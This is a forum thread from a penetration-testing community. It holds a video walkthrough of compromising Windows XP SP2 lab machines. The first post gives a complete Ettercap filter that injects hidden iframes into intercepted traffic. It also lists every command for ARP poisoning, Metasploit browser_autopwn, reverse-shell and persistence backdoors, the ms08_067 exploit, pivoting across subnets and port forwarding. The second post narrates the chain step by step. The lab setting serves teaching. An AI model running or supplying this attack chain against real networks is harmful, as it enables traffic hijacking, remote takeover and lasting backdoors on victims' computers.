Results 1 to 2 of 2

Thread: [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4654173/
    Download video:
    http://www.mediafire.com/?8ccnw93h6skqbas
    Download Script (iFrame_v2.zip): http://www.mediafire.com/?8mlgidgxlkv76qn


    Brief Overview
    This screencast starts off by carrying out a “Man In The Middle” (MITM) attack, to inject traffic making the target vulnerable to “Cross Site Scripting” (XSS) which is linked to Metasploit's “Browser_AutoPWN” feature.
    Upon being compromised, the attacker chooses to explore and exploit other devices which are attached to the internal network (Pivoting). To finalise, the attacker gains access to view the internal server via “Port Forwarding”.
    The attacker also installs backdoors into the network, allowing them to connect back at any stage.


    Scenario/Setup
    This is the second video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 2, in the aid of seeking better security, after becoming compromised previously.




    What do I need?

    • Ettercap – (Can be found on BackTrack 4-R2)
    • iFrame.filter (Can either be downloaded from “links” at the top or manually created from the code below)
    • Metasploit – (Can be found on BackTrack 4-R2)
    • Internet Browser – (Firefox can be found on BackTrack 4-R2)
    • Text Editor – (Kate can be found on BackTrack 4-R2)


    iFrame.filter
    Code:
    ########################################################################
    # iFrame.filter v2   --- Ettercap Filter (iFrame injection)            #
    # g0tmi1k 2011-03-09 --- 7x 192.168.0.33 <--- including this one!      #
    ########################################################################
    if (ip.proto == TCP && ip.dst != "192.168.0.33") {                 # If traffic is TCP protocol and its not coming to us....
       if (search(DATA.data, "gzip")) {                                # ...and if it contains an gzip in its header:
          replace("gzip", "    ");                                     # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
          msg("[*] Zapped 'gzip'\n");                                  # Let us know it's been done (=
       }
       if (search(DATA.data, "deflate")) {
          replace("deflate", "       ");
          msg("[*] Zapped 'deflate'\n");
       }
       if (search(DATA.data, "gzip,deflate")) {
          replace("gzip,deflate", "            ");
          msg("[*] Zapped 'gzip,deflate'\n");
       }
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg("[*] Zapped 'Accept-Encoding'\n");
       }
    #-----------------------------------------------------------------------
       if (search(DATA.data, "</title>")){                                                                                          # Is there something for us to inject into?
          replace("</title>","</title><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");   # ...Insert our iframe to the webpage!
          msg("[>] Injecting into (</title>)\n");                                                                                   # Let us know we have done it (=
       }
       if (search(DATA.data, "</TITLE>")){
          replace("</TITLE>","</TITLE><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (</TITLE>)\n");
       }
       if (search(DATA.data, "body>")){
          replace("body>","body><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (body>)\n");
       }
       if (search(DATA.data, "BODY>")){
          replace("BODY>","BODY><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (BODY>)\n");
       }
    
       if (search(DATA.data, "http://192.168.0.33")){                  # ...and search data, to test for our 'tweak' ;)
          msg("[+] Injected correctly!\n");                            # Let us know it's been done
       }
    }
    Method
    • Start network services, obtain an IP address and start PostgreSQL
    • Start metasploit and configure browser_autopwn to allow browser exploits
    • Setup Ettercap, prepare and compile filter
    • Once metasploit is ready, perform an ARP MITM attack
    • Wait for target to visit a web page
    • When a sessions has been establish, create a backdoor
    • Collect information on target
    • Start pivoting and scanning for other nodes
    • Perform a remote exploit
    • Create a backdoor, collect information, start pivoting and scanning... again
    • Once web server has been detected, port forward allowing for target to view content
    • Game Over



    Commands
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    msfconsole
    search autopwn
    use server/browser_autopwn
    show options
    set LHOST 192.168.0.33
    set SRVPORT 80
    set URIPATH /
    show options
    run
    
    kate /etc/etter.conf -> ec_uid = 0 -> ec_gid = 0 -> redir_command_on -> redir_command_off -> Save
    cat iFrame.filter
    etterfilter iFrame.filter -o iFrame.ef
    ettercap -T -q -i eth0 -F iFrame.ef -M ARP // // 
    
    ettercap -> q
    
    sessions -l -v
    sessions -i 1
    sysinfo
    run persistence -X -i 5 -p 445 -r 192.168.0.33
    reboot
    
    search handler
    use multi/handler
    show options
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.0.33
    set LPORT 445
    show options
    exploit -j
    
    jobs
    kill 0
    jobs
    
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    run checkvm
    ipconfig
    
    run get_local_subnets
    run autoroute -p 
    run autoroute -s 10.0.0.0/8
    run autoroute -p
    
    run arp_scanner -r 10.0.0.0/24
    background
    search portscan
    use scanner/portscan/tcp
    show options
    setg RHOSTS 10.0.0.101
    setg PORTS 80,137,139,445
    setg THREADS 50
    show options
    run
    
    search ms08_067_netapi
    use windows/smb/ms08_067_netapi
    show options
    set RHOST 10.0.0.101
    set PAYLOAD windows/meterpreter/bind_tcp
    set LPORT 4445
    show options
    exploit
    
    run metsvc
    exit
    
    search handler
    use multi/handler
    show options
    set PAYLOAD windows/metsvc_bind_tcp 
    set LPORT 31337
    set RHOST 10.0.0.101
    show options
    exploit
    
    sysinfo
    getuid
    ipconfig
    
    run get_local_subnets
    run autoroute -p
    run autoroute -s 172.16.0.0/12
    run autoroute -p 
    
    run arp_scanner -r 172.16.0.0/24
    background
    use scanner/portscan/syn
    show options
    set RHOSTS 172.16.0.33
    set PORTS 80,137,139,445
    set THREADS 50
    show options
    run
    
    sessions -l 
    sessions -i 4
    portfwd
    portfwd add -l 8080 -p 80 -r 172.16.0.33
    portfwd
    
    firefox localhost:800
    Last edited by g0tmi1k; 03-09-2011 at 11:06 PM.
    Have you...g0tmi1k?

  2. #2
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

    Walk-though
    The attacker approaches this attack differently by attacking the browser that is inbuilt to the operating system (OS) by using a collection of “browser exploits”. They start up metasploit and configure it to create their evil page.

    Once the evil web page has been set-up, it's a question of getting the target to visit this page. The attacker could try and “Socially Engineer” the target to view their web page (For example directly gets in contact either by placing a telephone call and saying the attacker is actually from technical support OR sends a spoofed email with their link disguised in the message). However, the attacker chooses to use XSS (Cross Site Scripting) to make the target visit the evil page when the target next views an infected page. The result being: the target visits the evil page without any knowledge of it happening.

    The attacker could find what sites the target views (example in their lunch break/after their evening meal) and look for a weakness in those sites which would allow for XSS to be inserted. However, by doing this, it would be a "general/mass” attack which isn't ideal as the attacker specifically wants to attack just this target. Additionally, the attacker would also have to wait until the target visits that site (e.g. next lunch time).
    To overcome this, the attacker decides to perform a Man In The Middle (MITM) attack, with the idea of speeding up the attack. As the attacker is on the same local area network (LAN) and subnet, the attacker has the option to perform “ARP poisoning” (Note: I plan to cover different methods of executing MITM attacks. Until then, see here).
    This would allow the attacker to manipulate the target's traffic. In this instance, the attacker injects a hidden iFrame, with their XSS code that would link to the browser exploits.

    The attacker is now ready and waits for the target to visit a vulnerable (1) web page so the target establishes a request to the evil page which responds with a collection of exploits.
    Metasploit uses JavaScript to fingerprint (potentially detect the target's environment) for OS, Versions and installed software which use exploits that the target would be vulnerable too, as there is not much point responding with Firefox exploits if the user is using Internet Explorer!
    Metasploit will automatically keep responding with remaining potential exploits until either a session is created or it hasn't got any more exploits left.

    As it turns out, the target browser is vulnerable to "Internet explorer COM CreateObject Code Execution". We gained a session! As it turns out, 6 sessions were spawned, as all three injections methods work and the target refreshed the page...

    The first thing the attacker commands is to create a backdoor, which allows for access afterwards without the need of exploiting the target again as it might not happen next time because the target might upgrade / patch the vulnerability.
    Metasploit has two methods to create a backdoor, one of which is to add a VBS (Visual Basic Script) file to start up (via registry) which will be triggered when either; the user logs in, the system starts up or the boot process initiates. In this instance, the attacker initializes the script to run when the user logs onto the computer, afterwards try to connect every 5 seconds back to the attacker.
    In the video I restarted the target's computer to test the backdoor.

    The attacker then starts to gather information on the target and when the attacker discovers that the target has another interface, chooses to explorer this (How deep does the rabbit hole go?)

    As the attacker has got their foot in the door, they proceed to add the new subnet (10.0.0.0/8) of the new interface into metasploit, allowing the attacker to pivot from that computer. This allows the attacker to launch attacks from the compromised target.
    This is useful for the attacker as they can launch attacks from inside the network instead of doing them remotely, which is beneficial as there is a chance that not all internal computers have their own firewall. This is something the attacker wouldn't be able to benefit from if they were doing a remote attack as they would have to worry about the WAN firewall.

    The attacker then starts an ARP scan to see who else is connected. This reveals that another node is connected (10.0.0.101). The attacker would like to know what services the target has running and does a port scan. This shows that the target has port 139 open. As this port is commonly used for NetBIOS and the attacker is aware of an exploit (ms08_067_netapi) that the target might be vulnerable to, they give it a try...

    The attacker is in! Just like before, the first thing the attacker proceeds to do is to create a backdoor, however this time chooses another method, which is to convert meterpreter to a service and to test it by connecting to it.
    Again just like before, the attacker starts to collect information on the target and also notices that it has another interface. Like last time, the attacker adds the new subnet (172.16.0.0/12), starts pivoting from it to detect what else is out there. The result being that there is yet another node attached and a port scan shows that it could be running a web server. The attacker wants to see for themselves, that they want to view the content of this internal server.

    The attacker set ups port forwarding which allows them to view the remote content locally.

    GAME OVER

    (1) The iFrame can be injected differently into each page as it depends on how the page is coded.
    When I was developing the filter, the one used in this method had the highest injection success rate with the lowest count of broken pages.
    The filter looks for “</title>” and “body>” tags (which covers “<body>” and “</body>”). Therefore, there are 3 possible places to inject into.
    It may not work on EVERY page for a few reasons, much as:

    • As the user may be using cache local version.
    • The page doesn't have a title. E.g. doesn’t use “<title></title>”.
    • The page has extra content in the body tags. E.g. “<body id=”something”>
    • Uses spaces to break up tags. e.g. “< / body > ".

    The top half of the script makes sure the web page is sent in plain text – and not compressed, which increases the chances of injection for the attacker.

    Notes:

    • The video recording software glitched making the mouse icon appear stuck in a fix position, as a result I hid the cursor. (First time recording it, virtual box crashed near the end, I didn't realised the mouse issue until I started editing it and I didn't really want to record it for a third time!)
    • All targets were using Windows XP Pro. Other than having their service packs installed, no other updates have been applied and everything is set at their default values.
    • Browser_autopwn may not work on your chosen target's web browser - Target in the video is running Windows XP SP2
    • Windows XP SP2 (First target) has a firewall and it's enabled, however, as the attack is reversed and the target connects back to the attacker which allows the connection happen.
    • Windows XP SP1 (Second target) has a firewall but its disabled by default (fail!). Therefore it doesn't matter too much about doing a bind connection, where the target is the server, allowing the attacker to connect.
    • As the target is making a connection out to the evil page (without the target knowing it!) it bypasses window's in-built firewall making it not a issue. However some 3rd party firewalls and or a Intrusion Detection System (IDS) may detect it.

    Song: Edvard Grieg - In the Hall of the Mountain King & Richard Wagner - Ride Of The Valkyries & Rossini - William Tell Overture (Finale) & Tchaikovsky - '1812' Overture

    Video length: 12:04
    Capture length: 35:11
    Blog Post: http://g0tmi1k.blogspot.com/2011/01/video-owning-windows-xp-sp2-vs.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38305-%5Bvideo%5D-owning-windows-xp-sp2-vs-metasploits-browser_autopwn.html
    Last edited by g0tmi1k; 03-05-2011 at 12:09 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Owning Sever through Local File Include
    By spawn in forum BackTrack Videos
    Replies: 1
    Last Post: 03-08-2011, 06:13 PM
  2. Replies: 5
    Last Post: 03-07-2011, 12:18 AM
  3. Replies: 21
    Last Post: 03-02-2011, 07:06 PM
  4. Owning a Windows XP with a shared folder.
    By sickness in forum BackTrack Videos
    Replies: 6
    Last Post: 02-12-2011, 02:56 AM
  5. Metasploit Browser_autopwn module error, need help
    By cgelici in forum Beginners Forum
    Replies: 0
    Last Post: 11-23-2010, 02:48 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •